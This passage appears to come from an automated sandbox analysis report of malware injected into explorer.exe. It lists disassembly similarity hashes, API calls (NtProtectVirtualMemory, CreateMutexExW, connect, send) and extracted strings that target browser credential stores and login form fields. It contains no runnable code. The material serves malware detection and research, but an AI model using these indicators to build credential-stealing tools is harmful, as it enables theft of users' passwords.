• API ID: MemoryProtectVirtual
• String ID:
• API String ID: 2706961497-0
• Opcode ID: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
• Instruction ID: dab135c3dd58b5e6c1a1718a13ec1ea8eb8af0f9ef68f6e1ede88f72bfd1b97e
• Opcode Fuzzy Hash: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
• Instruction Fuzzy Hash: 3F019E30628B884F8B88EF6CD48012AB7E4FBC9214F000B3EA99AC3250EB64C5414752

                                                                                                                                                                                                                      Control-flow Graph

Control-flow graph of fe95e0a (basic blocks fe95e0a to fe95e8f; the interactive block graph is not reproduced): a second entry point into the same NtProtectVirtualMemory wrapper as fe95e12, calling fe94942 and then NtProtectVirtualMemory (same reference 0FE95E67) before exiting through fe95e70 or fe95e7d.
APIs
• NtProtectVirtualMemory.NTDLL ref: 0FE95E67
Memory Dump Source
• Source File: 00000006.00000002.4608445473.000000000FE00000.00000040.80000000.00040000.00000000.sdmp, Offset: 0FE00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_fe00000_explorer.jbxd
Similarity
• API ID: MemoryProtectVirtual
• String ID:
• API String ID: 2706961497-0
• Opcode ID: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
• Instruction ID: ac23aa467dcdac8d4c3af21ed3b1b5502a2a358510eb73fad6014de10aad3e38
• Opcode Fuzzy Hash: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
• Instruction Fuzzy Hash: 2301A23462CB884B8B48EB3C94412A6B3E5FBCE314F000B3EE99AC3251EB25D5024782

Control-flow Graph
APIs
• ObtainUserAgentString.URLMON ref: 0FE8F9A0
Strings
Memory Dump Source
• Source File: 00000006.00000002.4608445473.000000000FE00000.00000040.80000000.00040000.00000000.sdmp, Offset: 0FE00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_fe00000_explorer.jbxd
Similarity
• API ID: AgentObtainStringUser
• String ID: User-Agent: $nt: $on.d$urlmon.dll
• API String ID: 2681117516-319646191
• Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
• Instruction ID: 9d072e0b0c46b06b9c643cfc37de6443ce2472d2ab14e26704c70be540f71765
• Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
• Instruction Fuzzy Hash: 6131FD31618B5C8BCF10EFA8C8887EEBBE1FB58204F40122AD44ED7241DE788645C799

Control-flow Graph
APIs
• ObtainUserAgentString.URLMON ref: 0FE8F9A0
Strings
Memory Dump Source
• Source File: 00000006.00000002.4608445473.000000000FE00000.00000040.80000000.00040000.00000000.sdmp, Offset: 0FE00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_fe00000_explorer.jbxd
Similarity
• API ID: AgentObtainStringUser
• String ID: User-Agent: $nt: $on.d$urlmon.dll
• API String ID: 2681117516-319646191
• Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
• Instruction ID: 7cd21e60f7f784b8dc17238f4b415c9c7dd1a214df49d48406c8f62342ddac8e
• Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
• Instruction Fuzzy Hash: DE21EE70A14B5C8ACF15EFA8C8847EEBBE1FF58204F40522AD45ED7251DE788605CB99

Control-flow Graph
control_flow_graph 232 fe8bb66-fe8bb68 233 fe8bb6a-fe8bb6b 232->233 234 fe8bb93-fe8bbb8 232->234 235 fe8bb6d-fe8bb71 233->235 236 fe8bbbe-fe8bc22 call fe92612 call fe94942 * 2 233->236 237 fe8bbbb-fe8bbbc 234->237 235->237 238 fe8bb73-fe8bb92 235->238 246 fe8bc28-fe8bc2b 236->246 247 fe8bcdc 236->247 237->236 238->234 246->247 248 fe8bc31-fe8bcb0 call fe96da4 call fe96022 call fe963e2 call fe96022 call fe963e2 246->248 249 fe8bcde-fe8bcf6 247->249 261 fe8bcb5-fe8bcca CreateMutexExW 248->261 262 fe8bcce-fe8bcd3 261->262 262->247 263 fe8bcd5-fe8bcda 262->263 263->249
APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.4608445473.000000000FE00000.00000040.80000000.00040000.00000000.sdmp, Offset: 0FE00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_fe00000_explorer.jbxd
Similarity
• API ID: CreateMutex
• String ID: .dll$el32$kern
• API String ID: 1964310414-1222553051
• Opcode ID: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
• Instruction ID: c54581a2d9bfa52be551faee12858ba4f97fc60cb480dbd43f6b69d40d709afc
• Opcode Fuzzy Hash: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
• Instruction Fuzzy Hash: B8416A70928A088FDF54FFA8C4947AD77E0FBA8300F44517AC84EDB256DE349946CB95

Control-flow Graph
APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.4608445473.000000000FE00000.00000040.80000000.00040000.00000000.sdmp, Offset: 0FE00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_fe00000_explorer.jbxd
Similarity
• API ID: CreateMutex
• String ID: .dll$el32$kern
• API String ID: 1964310414-1222553051
• Opcode ID: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
• Instruction ID: c168c6570f9710842c880358101a30b35e65bd12a75d9fb2209ba0a01b659950
• Opcode Fuzzy Hash: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
• Instruction Fuzzy Hash: E7414970918A088FDF94EFA8C4987ED77E0FBA8300F44516AC84EDB256DE349946CB95

Control-flow Graph
control_flow_graph 293 fe9172e-fe91768 294 fe91788-fe917ab connect 293->294 295 fe9176a-fe91782 call fe94942 293->295 295->294
APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.4608445473.000000000FE00000.00000040.80000000.00040000.00000000.sdmp, Offset: 0FE00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_fe00000_explorer.jbxd
Similarity
• API ID: connect
• String ID: conn$ect
• API String ID: 1959786783-716201944
• Opcode ID: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
• Instruction ID: 142de0ff6f6621231ac2c1ed1768efa049f741543c21806d72bc81a0019d2400
• Opcode Fuzzy Hash: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
• Instruction Fuzzy Hash: 44011A70618B1C8FCB94EF5CE088B55B7E0FB59324F1545AEE90DCB266CA74D9818BC2

Control-flow Graph
control_flow_graph 298 fe91732-fe91768 299 fe91788-fe917ab connect 298->299 300 fe9176a-fe91782 call fe94942 298->300 300->299
APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.4608445473.000000000FE00000.00000040.80000000.00040000.00000000.sdmp, Offset: 0FE00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_fe00000_explorer.jbxd
Similarity
• API ID: connect
• String ID: conn$ect
• API String ID: 1959786783-716201944
• Opcode ID: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
• Instruction ID: c2ececf72d8218aa637e6292bf5ef583355689e927f0fabfe4b4dd0268d98baf
• Opcode Fuzzy Hash: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
• Instruction Fuzzy Hash: A4012C70618A1C8FCB84EF5CE088B55B7E0FB59314F1541AEA90DCB266CA74C9818BC2

Control-flow Graph
control_flow_graph 411 fe916b2-fe916e5 412 fe91705-fe9172d send 411->412 413 fe916e7-fe916ff call fe94942 411->413 413->412
APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.4608445473.000000000FE00000.00000040.80000000.00040000.00000000.sdmp, Offset: 0FE00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_fe00000_explorer.jbxd
Similarity
• API ID: send
• String ID: send
• API String ID: 2809346765-2809346765
• Opcode ID: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
• Instruction ID: a17d207120f2cc0dacff50125d6e1fd36b376b71a69f8e1b830c2e2db0915aeb
• Opcode Fuzzy Hash: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
• Instruction Fuzzy Hash: B501127051CA1D8FDB84EF1CD048B2577E0EB58315F1545AED85DCB266C674D8818B81

APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.4608445473.000000000FE00000.00000040.80000000.00040000.00000000.sdmp, Offset: 0FE00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_fe00000_explorer.jbxd
Similarity
• API ID: socket
• String ID: sock
• API String ID: 98920635-2415254727

APIs
Memory Dump Source
• Source File: 00000006.00000002.4608445473.000000000FE00000.00000040.80000000.00040000.00000000.sdmp, Offset: 0FE00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_fe00000_explorer.jbxd
Similarity
• API ID: Sleep
• String ID:
• API String ID: 3472027048-0

APIs
Memory Dump Source
• Source File: 00000006.00000002.4608445473.000000000FE00000.00000040.80000000.00040000.00000000.sdmp, Offset: 0FE00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_fe00000_explorer.jbxd
Similarity
• API ID: CreateThread
• String ID:
• API String ID: 2422867632-0
Strings
Memory Dump Source
• Source File: 00000006.00000002.4608643398.0000000010400000.00000040.00000001.00040000.00000000.sdmp, Offset: 10400000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_10400000_explorer.jbxd
Similarity
• API ID:
• String ID: .dll$32.d$M$S$dll$el32$kern$ll$net.$user$wini
• API String ID: 0-393284711
Strings
Memory Dump Source
• Source File: 00000006.00000002.4608643398.0000000010400000.00000040.00000001.00040000.00000000.sdmp, Offset: 10400000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_10400000_explorer.jbxd
Similarity
• API ID:
• String ID: Fiel$Subm$d$dPas$dUse$e$encr$encr$form$guid$itUR$name$rnam$swor$user$ypte$ypte
• API String ID: 0-2916316912
Strings
Memory Dump Source
• Source File: 00000006.00000002.4608643398.0000000010400000.00000040.00000001.00040000.00000000.sdmp, Offset: 10400000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_10400000_explorer.jbxd
Similarity
• API ID:
• String ID: 2$c$d$d$d$e$i$l$l$l$n$n$p$s$t$u$w
• API String ID: 0-1539916866
Strings
Memory Dump Source
• Source File: 00000006.00000002.4608643398.0000000010400000.00000040.00000001.00040000.00000000.sdmp, Offset: 10400000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_10400000_explorer.jbxd
Similarity
• API ID:
• String ID: D$[$[$[$[$[$]$]$b$c$e$l$l$n
• API String ID: 0-355182820
Strings
Memory Dump Source
• Source File: 00000006.00000002.4608643398.0000000010400000.00000040.00000001.00040000.00000000.sdmp, Offset: 10400000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_10400000_explorer.jbxd
Similarity
• API ID:
• String ID: .$0$c$n$r$r$r$r$r$r$r$r
• API String ID: 0-97273177
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.4608643398.0000000010400000.00000040.00000001.00040000.00000000.sdmp, Offset: 10400000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_10400000_explorer.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                                                                                                                                                                                                      • API String ID: 0-639201278
                                                                                                                                                                                                                      • Opcode ID: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
                                                                                                                                                                                                                      • Instruction ID: 888942359697fbe910ea966bd3a3c431b3bd2c866eccddb52b85c29f5c329e6e
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 86C1B175628A198FC748EF68D496AEAB3E1FB94304F41832DA54EC7251DF38EA01C7C5
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.4608643398.0000000010400000.00000040.00000001.00040000.00000000.sdmp, Offset: 10400000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_10400000_explorer.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                                                                                                                                                                                                      • API String ID: 0-639201278
                                                                                                                                                                                                                      • Opcode ID: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                                                                                                                                                                                                      • Instruction ID: 91912a83d573f3e82ada93e8e5c189607c3bcc17d288211b6114ef1ac55f343e
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2FC1A175628A198FC748EF68D496AEAB3E1FB94304F41832DA54EC7251DF38EA01C7C5
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.4608643398.0000000010400000.00000040.00000001.00040000.00000000.sdmp, Offset: 10400000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_10400000_explorer.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: UR$2$L: $Pass$User$name$word
                                                                                                                                                                                                                      • API String ID: 0-2058692283
                                                                                                                                                                                                                      • Opcode ID: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
                                                                                                                                                                                                                      • Instruction ID: 1bff6be570f1db66cc5ca0788616f696137708cf50dd61fbcc7597c1f7a96750
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 35A1C0706287888FDB18EFA89485BEEB7F1FF88304F40862DE48AD7241EF7495458785
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.4608643398.0000000010400000.00000040.00000001.00040000.00000000.sdmp, Offset: 10400000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_10400000_explorer.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: UR$2$L: $Pass$User$name$word
                                                                                                                                                                                                                      • API String ID: 0-2058692283
                                                                                                                                                                                                                      • Opcode ID: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
                                                                                                                                                                                                                      • Instruction ID: f7c639ec367eca5db30ca715b7d7248ca509ccf1987d00abe011c94eb42d10ed
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DB919E706187488FDB18EFA89485BEEB7F1FF88304F40862EE48AD7251EB7495458785
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.4608643398.0000000010400000.00000040.00000001.00040000.00000000.sdmp, Offset: 10400000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_10400000_explorer.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: $.$e$n$v
                                                                                                                                                                                                                      • API String ID: 0-1849617553
                                                                                                                                                                                                                      • Opcode ID: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                                                                                                                                                                                                                      • Instruction ID: 06fc2b88afda5484ff0131255a31159557a53c7b29768bf6b28ae43b9edd35b5
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 967191316187488FD758EF68C4C57EAB7F1FF58308F00462EE44AC7221EB75A9458B85
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.4608643398.0000000010400000.00000040.00000001.00040000.00000000.sdmp, Offset: 10400000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_10400000_explorer.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: 2.dl$dll$l32.$ole3$shel
                                                                                                                                                                                                                      • API String ID: 0-1970020201
                                                                                                                                                                                                                      • Opcode ID: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                                                                                                                                                                                                      • Instruction ID: 5f88907158df7a399256051d74fa72a232ea0645dff6ce215a9e694640433202
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 02514DB4914B4C8BDB64DF64C0857EEB7F1FF58304F40462EA59AE7214EF34A5418B89
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.4608643398.0000000010400000.00000040.00000001.00040000.00000000.sdmp, Offset: 10400000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_10400000_explorer.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: 4$\$dll$ion.$vers
                                                                                                                                                                                                                      • API String ID: 0-1610437797
                                                                                                                                                                                                                      • Opcode ID: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                                                                                                                                                                                                      • Instruction ID: f07fbdbee8905c0223002d8c233252a06a292cd6ec99fc3eb647ae5232f64dc0
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 00417234219B4C8BCBA5EF2898857EA73E5FB98305F41862E995EC7250EF34D50587C2
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.4608643398.0000000010400000.00000040.00000001.00040000.00000000.sdmp, Offset: 10400000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_10400000_explorer.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: 32.d$cli.$dll$sspi$user
                                                                                                                                                                                                                      • API String ID: 0-327345718
                                                                                                                                                                                                                      • Opcode ID: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                                                                                                                                                                                                      • Instruction ID: f4b579e2195e444fffb2d24848ff38e20b5e96187f2b6aca40e2fc643fc7b57a
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 08417E70A18E0D9FCB98EF6880D67ED77E1FB58301F41856EA80ED7300DA39D9418B86
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.4608643398.0000000010400000.00000040.00000001.00040000.00000000.sdmp, Offset: 10400000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_10400000_explorer.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: .dll$el32$h$kern
                                                                                                                                                                                                                      • API String ID: 0-4264704552

Execution Graph

Execution Coverage: 1.6%
Dynamic/Decrypted Code Coverage: 6.8%
Signature Coverage: 0%
Total number of Nodes: 620
Total number of Limit Nodes: 75
113587->113588 113588->113526 113588->113527 113588->113530 113590 2a1a34c NtCreateFile 113589->113590 113591 2a1af30 LdrLoadDll 113589->113591 113590->113531 113591->113590 113593 2a1470c 113592->113593 113594 2a1a2b0 LdrLoadDll 113593->113594 113595 2a1472d 113594->113595 113596 2a14734 113595->113596 113597 2a14748 113595->113597 113598 2a1a460 2 API calls 113596->113598 113599 2a1a460 2 API calls 113597->113599 113600 2a1473d 113598->113600 113601 2a14751 113599->113601 113600->113554 113656 2a1bfa0 LdrLoadDll RtlAllocateHeap 113601->113656 113603 2a1475c 113603->113554 113605 2a1445b 113604->113605 113606 2a1448e 113604->113606 113608 2a1a2b0 LdrLoadDll 113605->113608 113607 2a145d9 113606->113607 113611 2a144aa 113606->113611 113609 2a1a2b0 LdrLoadDll 113607->113609 113610 2a14476 113608->113610 113616 2a145f4 113609->113616 113612 2a1a460 2 API calls 113610->113612 113613 2a1a2b0 LdrLoadDll 113611->113613 113614 2a1447f 113612->113614 113615 2a144c5 113613->113615 113614->113557 113618 2a144e1 113615->113618 113619 2a144cc 113615->113619 113669 2a1a2f0 LdrLoadDll 113616->113669 113622 2a144e6 113618->113622 113623 2a144fc 113618->113623 113621 2a1a460 2 API calls 113619->113621 113620 2a1462e 113624 2a1a460 2 API calls 113620->113624 113625 2a144d5 113621->113625 113626 2a1a460 2 API calls 113622->113626 113631 2a14501 113623->113631 113657 2a1bf60 113623->113657 113627 2a14639 113624->113627 113625->113557 113628 2a144ef 113626->113628 113627->113557 113628->113557 113640 2a14513 113631->113640 113660 2a1a3e0 113631->113660 113632 2a14567 113633 2a1457e 113632->113633 113668 2a1a270 LdrLoadDll 113632->113668 113635 2a14585 113633->113635 113636 2a1459a 113633->113636 113638 2a1a460 2 API calls 113635->113638 113637 2a1a460 2 API calls 113636->113637 113639 2a145a3 113637->113639 113638->113640 113641 2a145cf 113639->113641 113663 2a1bb60 113639->113663 113640->113557 113641->113557 113643 2a145ba 113644 2a1bd90 2 API calls 113643->113644 113645 2a145c3 
113644->113645 113645->113557 113646->113530 113647->113553 113649 2a1af30 LdrLoadDll 113648->113649 113650 2a14d14 113649->113650 113651 2a1a2f0 LdrLoadDll 113650->113651 113651->113556 113653 2a1af30 LdrLoadDll 113652->113653 113654 2a1a47c NtClose 113653->113654 113654->113559 113655->113539 113656->113603 113670 2a1a600 113657->113670 113659 2a1bf78 113659->113631 113661 2a1af30 LdrLoadDll 113660->113661 113662 2a1a3fc NtReadFile 113661->113662 113662->113632 113664 2a1bb84 113663->113664 113665 2a1bb6d 113663->113665 113664->113643 113665->113664 113666 2a1bf60 2 API calls 113665->113666 113667 2a1bb9b 113666->113667 113667->113643 113668->113633 113669->113620 113671 2a1af30 LdrLoadDll 113670->113671 113672 2a1a61c RtlAllocateHeap 113671->113672 113672->113659 113674 2a14081 113673->113674 113675 2a14089 113673->113675 113674->113567 113704 2a1435c 113675->113704 113800 2a1cf00 113675->113800 113677 2a140dd 113678 2a1cf00 2 API calls 113677->113678 113681 2a140e8 113678->113681 113679 2a14136 113682 2a1cf00 2 API calls 113679->113682 113681->113679 113808 2a1cfa0 LdrLoadDll RtlAllocateHeap RtlFreeHeap 113681->113808 113809 2a1d030 113681->113809 113684 2a1414a 113682->113684 113685 2a141a7 113684->113685 113687 2a1d030 3 API calls 113684->113687 113686 2a1cf00 2 API calls 113685->113686 113688 2a141bd 113686->113688 113687->113684 113689 2a141fa 113688->113689 113692 2a1d030 3 API calls 113688->113692 113690 2a1cf00 2 API calls 113689->113690 113691 2a14205 113690->113691 113693 2a1d030 3 API calls 113691->113693 113699 2a1423f 113691->113699 113692->113688 113693->113691 113696 2a1cf60 2 API calls 113697 2a1433e 113696->113697 113698 2a1cf60 2 API calls 113697->113698 113700 2a14348 113698->113700 113805 2a1cf60 113699->113805 113701 2a1cf60 2 API calls 113700->113701 113702 2a14352 113701->113702 113703 2a1cf60 2 API calls 113702->113703 113703->113704 113704->113567 113706 2a153a1 113705->113706 113707 2a14a50 8 API calls 113706->113707 113709 2a153b7 
113707->113709 113708 2a1540a 113708->113571 113709->113708 113710 2a153f2 113709->113710 113711 2a15405 113709->113711 113712 2a1bd90 2 API calls 113710->113712 113713 2a1bd90 2 API calls 113711->113713 113714 2a153f7 113712->113714 113713->113708 113714->113571 113815 2a1ac00 113715->113815 113717 2a1ad54 113718 2a1ac00 LdrLoadDll 113717->113718 113719 2a1ad5d 113718->113719 113720 2a1ac00 LdrLoadDll 113719->113720 113721 2a1ad66 113720->113721 113722 2a1ac00 LdrLoadDll 113721->113722 113723 2a1ad6f 113722->113723 113724 2a1ac00 LdrLoadDll 113723->113724 113725 2a1ad78 113724->113725 113726 2a1ac00 LdrLoadDll 113725->113726 113727 2a1ad81 113726->113727 113728 2a1ac00 LdrLoadDll 113727->113728 113729 2a1ad8d 113728->113729 113730 2a1ac00 LdrLoadDll 113729->113730 113731 2a1ad96 113730->113731 113732 2a1ac00 LdrLoadDll 113731->113732 113733 2a1ad9f 113732->113733 113734 2a1ac00 LdrLoadDll 113733->113734 113735 2a1ada8 113734->113735 113736 2a1ac00 LdrLoadDll 113735->113736 113737 2a1adb1 113736->113737 113738 2a1ac00 LdrLoadDll 113737->113738 113739 2a1adba 113738->113739 113740 2a1ac00 LdrLoadDll 113739->113740 113741 2a1adc6 113740->113741 113742 2a1ac00 LdrLoadDll 113741->113742 113743 2a1adcf 113742->113743 113744 2a1ac00 LdrLoadDll 113743->113744 113745 2a1add8 113744->113745 113746 2a1ac00 LdrLoadDll 113745->113746 113747 2a1ade1 113746->113747 113748 2a1ac00 LdrLoadDll 113747->113748 113749 2a1adea 113748->113749 113750 2a1ac00 LdrLoadDll 113749->113750 113751 2a1adf3 113750->113751 113752 2a1ac00 LdrLoadDll 113751->113752 113753 2a1adff 113752->113753 113754 2a1ac00 LdrLoadDll 113753->113754 113755 2a1ae08 113754->113755 113756 2a1ac00 LdrLoadDll 113755->113756 113757 2a1ae11 113756->113757 113758 2a1ac00 LdrLoadDll 113757->113758 113759 2a1ae1a 113758->113759 113760 2a1ac00 LdrLoadDll 113759->113760 113761 2a1ae23 113760->113761 113762 2a1ac00 LdrLoadDll 113761->113762 113763 2a1ae2c 113762->113763 113764 2a1ac00 LdrLoadDll 113763->113764 113765 2a1ae38 
113764->113765 113766 2a1ac00 LdrLoadDll 113765->113766 113767 2a1ae41 113766->113767 113768 2a1ac00 LdrLoadDll 113767->113768 113769 2a1ae4a 113768->113769 113770 2a1ac00 LdrLoadDll 113769->113770 113771 2a1ae53 113770->113771 113772 2a1ac00 LdrLoadDll 113771->113772 113773 2a1ae5c 113772->113773 113774 2a1ac00 LdrLoadDll 113773->113774 113775 2a1ae65 113774->113775 113776 2a1ac00 LdrLoadDll 113775->113776 113777 2a1ae71 113776->113777 113778 2a1ac00 LdrLoadDll 113777->113778 113779 2a1ae7a 113778->113779 113780 2a1ac00 LdrLoadDll 113779->113780 113781 2a1ae83 113780->113781 113782 2a1ac00 LdrLoadDll 113781->113782 113783 2a1ae8c 113782->113783 113784 2a1ac00 LdrLoadDll 113783->113784 113785 2a1ae95 113784->113785 113786 2a1ac00 LdrLoadDll 113785->113786 113787 2a1ae9e 113786->113787 113788 2a1ac00 LdrLoadDll 113787->113788 113789 2a1aeaa 113788->113789 113790 2a1ac00 LdrLoadDll 113789->113790 113791 2a1aeb3 113790->113791 113792 2a1ac00 LdrLoadDll 113791->113792 113793 2a1aebc 113792->113793 113793->113575 113795 2a1af30 LdrLoadDll 113794->113795 113796 2a19eac 113795->113796 113821 4ad2df0 LdrInitializeThunk 113796->113821 113797 2a19ec3 113797->113505 113799->113572 113801 2a1cf10 113800->113801 113802 2a1cf16 113800->113802 113801->113677 113803 2a1bf60 2 API calls 113802->113803 113804 2a1cf3c 113803->113804 113804->113677 113806 2a1bd90 2 API calls 113805->113806 113807 2a14334 113806->113807 113807->113696 113808->113681 113810 2a1cfa0 113809->113810 113811 2a1bf60 2 API calls 113810->113811 113813 2a1cffd 113810->113813 113812 2a1cfda 113811->113812 113814 2a1bd90 2 API calls 113812->113814 113813->113681 113814->113813 113816 2a1ac1b 113815->113816 113817 2a14e50 LdrLoadDll 